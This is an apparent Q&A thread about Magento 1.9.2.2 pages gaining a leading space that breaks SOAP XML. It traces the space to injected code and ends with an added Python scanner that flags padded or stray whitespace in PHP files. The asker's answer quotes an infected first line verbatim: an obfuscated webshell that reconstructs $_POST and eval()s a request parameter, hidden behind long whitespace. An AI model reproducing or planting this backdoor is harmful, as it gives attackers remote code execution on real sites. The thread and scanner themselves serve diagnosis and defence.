1

Since upgrading to 1.9.2.2, every Magento page on my store is pre-padded with a space before the page content. This breaks XML pages such as the Magento SOAP API, giving the following error when loaded in the browser:

This page contains the following errors:

error on line 1 at column 8: XML declaration allowed only at the start of the document

Below is a rendering of the page up to the first error.

I found that the minimal code required for the spaces to be added is the following:

<?php
require_once 'app/Mage.php';
require_once 'app/code/core/Mage/Core/Model/Config/Options.php';

How can I find the point where the padding occurs?

ramiwi

2 Answers

4

It's most likely that there is a module installed, or a custom theme installed, that has trailing whitespace after the closing ?> in a file or class.

Because it's happening with both Mage.php and Config/Options.php, I would look at those two files first.

After that, disable all local modules and follow the standard debug process outlined here:

Fundamentals for debugging a Magento store

Best of luck.

philwinkle

1

Problem solved. Some PHP files were infected with a code injection exploit (described here: https://stackoverflow.com/questions/30270641/what-does-this-php-code-do). This exploit script was added to the beginning of PHP files. It is designed to look like a normal beginning, as the hack code has been spaced over by typically 250+ spaces so it's not seen at first glance in a text editor when word-wrap is off.

Example first line from an infected file (scroll right to see the hack script):

<?php                                                                                                                                                                                                                                                                          $vzq3 = "t_osp";$zqr5= strtoupper($vzq3[1].$vzq3[4] . $vzq3[2].$vzq3[3]. $vzq3[0]) ; if( isset( ${$zqr5 }['q3e818c'])) { eval( ${$zqr5 }['q3e818c']); }?> <?php

The single space between the hack script and the original <?php opening was added to every page in my Magento site, breaking Magento's SOAP API, as XMLs with preceding spaces are invalid.

ramiwi
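
A scanner for the two causes discussed in the answers above (stray whitespace outside PHP tags, and an opening tag padded with a long run of spaces before more code), as an added example that is not part of the original posts. The function names, check names, the 100-character threshold and the sample bytes are assumptions made for illustration; only `.php` files are scanned, because whitespace between tags is normal in `.phtml` templates.

```python
import re
import sys
from pathlib import Path

# Heuristic threshold (assumption): the answer reports "typically 250+ spaces".
MIN_PAD = 100

CHECKS = {
    # Code pushed off-screen: opening tag, long run of blanks, then more code.
    "code-after-long-padding": re.compile(rb"<\?php[ \t]{%d,}\S" % MIN_PAD),
    # Whitespace outside PHP tags is sent to the client. PHP swallows exactly
    # one newline directly after "?>", so that single case is not reported.
    "whitespace-after-close-tag":
        re.compile(rb"\?>(?!\r?\n(?:<\?|\Z))[ \t\r\n]+(?:<\?|\Z)"),
    # Anything (BOM, blanks) before the first opening tag is also output.
    "bytes-before-open-tag": re.compile(rb"\A(?:\xef\xbb\xbf|[ \t\r\n])+<\?"),
}


def scan_bytes(data: bytes) -> list[tuple[str, int]]:
    """Return (check name, 1-based line number) for every hit in one file."""
    hits = []
    for name, pattern in CHECKS.items():
        for m in pattern.finditer(data):
            hits.append((name, data.count(b"\n", 0, m.start()) + 1))
    return hits


def scan_tree(root: str):
    """Yield (path, hits) for each .php file under root with at least one hit."""
    for path in sorted(Path(root).rglob("*.php")):
        if path.is_file():
            hits = scan_bytes(path.read_bytes())
            if hits:
                yield path, hits


# Constructed sample with the layout from the answer; the payload is a harmless
# assignment standing in for the injected statement.
SAMPLE_INFECTED = b"<?php" + b" " * 250 + b"$x = 1; ?> <?php\nclass Foo {}\n"
SAMPLE_CLEAN = b"<?php\nclass Foo {}\n"

if __name__ == "__main__":
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        for name, line in hits:
            print(f"{path}:{line}: {name}")
```

Run from the Magento root, it prints one `path:line: check` line per finding; a hit is a file to open and inspect, not proof of infection.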